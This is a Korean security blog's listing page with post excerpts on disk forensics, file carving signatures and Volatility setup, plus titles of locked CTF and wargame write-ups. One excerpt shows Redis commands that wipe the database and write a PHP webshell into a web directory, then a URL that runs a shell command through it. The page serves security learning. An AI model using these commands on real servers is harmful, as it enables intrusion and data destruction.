Security
클러스터, 섹터, 슬랙 ( Cluster, Sector, Slack )
클러스터, 섹터, 슬랙 ( Cluster, Sector, Slack )
2017.11.01Sector디스크는 IO 명령을 받으면, 1 sector 단위로 IO하게 된다.즉, 물리적으로 디스크가 IO하는 단위이며 따라서 실제로 디스크에 IO하게 되는 최소 크기는 1 sector다.보통 1 Sector = 512 bytes. ClusterOS에서 디스크에 접근하기 위해 사용하는 파일시스템에서 IO하는 단위.파일시스템에서는 IO횟수를 줄이기 위해 Sector 단위로 관리하지 않고 Sector들을 묶어 Cluster로 관리한다.따라서 파일시스템에서 IO 명령을 내리는 최소 단위는 1 Cluster가 된다.파일시스템에 따라 다르지만, 보통 8 sectors를 묶어 1 Cluster = 4 KB Slack이런 식으로 파일의 실제 크기와 디스크 최소 IO 크기, 파일시스템 최소 IO 크기가 차이가 나기 ..
파일 카빙 ( File Carving )
파일 카빙 ( File Carving )
2017.11.01파일 카빙 ( File Carving )metadata 보다는 파일 자체의 바이너리 데이터(content, signature, header, ...)를 이용해 디스크의 비할당 영역에서 파일을 복구하는 기법.* 파일이 디스크에 분할되어 저장되어 있는 경우, 비연속적 카빙을 사용해야 한다. http://forensic.korea.ac.kr/DFWIKI/index.php/데이터_복구 헤더, 푸터 시그니처를 모두 갖는 파일 포맷파일 포멧시그니처헤더(Hex)푸터(Hex)JPEGFF D8FF D9GIF]47 49 46 38 37 61 ("GIF87a")00 3B47 49 46 38 39 61 ("GIF89a")PNG89 50 4E 47 0D 0A 1A 0A49 45 4E 44 AE 42 60 82PDF25 50 4..
Webshell pattern 웹쉘 패턴
Webshell pattern 웹쉘 패턴
2017.10.28이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
[CCE2017] Blue : 예선
[CCE2017] Blue : 예선
2017.10.27이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
Volatility
Volatility
2017.10.27installstandalone 보다는 Source code로 직접 받아야 profile을 추가할 수 있다.Source code 압축 해제하면 `` setup.py``가 있는데 ``py import volatility``할거 아니면 안하는게 좋다.그냥 디렉토리 적당한 곳으로 옮기고, `` vol.py``에 symlink 걸어서 사용하면 끝이다. profile 추가Windows profile은 기본적으로 같이 설치되지만 LInux profile은 포함되어 있지 않다.`` --profile``옵션을 지정해주어야 분석이 가능하기 때문에 추가해주어야 한다.* 이미지가 Volatility에 없는 profile인 경우 결과를 출력하기 까지 굉장히 오래 걸린다.* 모든 profile을 추가하면 volatility가 ..
[pwnable.kr] exynos
[pwnable.kr] exynos
2017.10.11이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
[pwnable.kr] syscall
[pwnable.kr] syscall
2017.10.09이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
[pwnable.kr] brainfuck
[pwnable.kr] brainfuck
2017.10.09이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
[pwnable.kr] unlink : normal한 해결책으로 안풀리면, 어셈에 abnormal한 부분이 있나 확인
[pwnable.kr] unlink : normal한 해결책으로 안풀리면, 어셈에 abnormal한 부분이 있나 확인
2017.10.06이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
redis를 통해 webshell upload
redis를 통해 webshell upload
2017.10.05webshell upload```bashFLUSHALLeval 'redis.call("set", "", "test"); redis.call("config", "set", "dir", "/var/www/html/cache/"); redis.call("config", "set", "dbfilename", "exploit.php");' 0savequit``````http://192.168.13.133/cache/exploit.php?cmd=echo%20`ls%20-l`;```REDIS0008�redis-ver4.0.2� redis-bits�@�ctime�*��Y�used-mem�� �repl-stream-db���repl-id(b256256c124e6f5671af7f82508ead2baa3b784d�repl-..
[webhacking.kr] 52 : CRLF Injection, HTTP response splitting
[webhacking.kr] 52 : CRLF Injection, HTTP response splitting
2017.09.30이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
[webhacking.kr] 13 : Blind SQL Injection : Subquery, 다중행 연산자
[webhacking.kr] 13 : Blind SQL Injection : Subquery, 다중행 연산자
2017.09.29이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.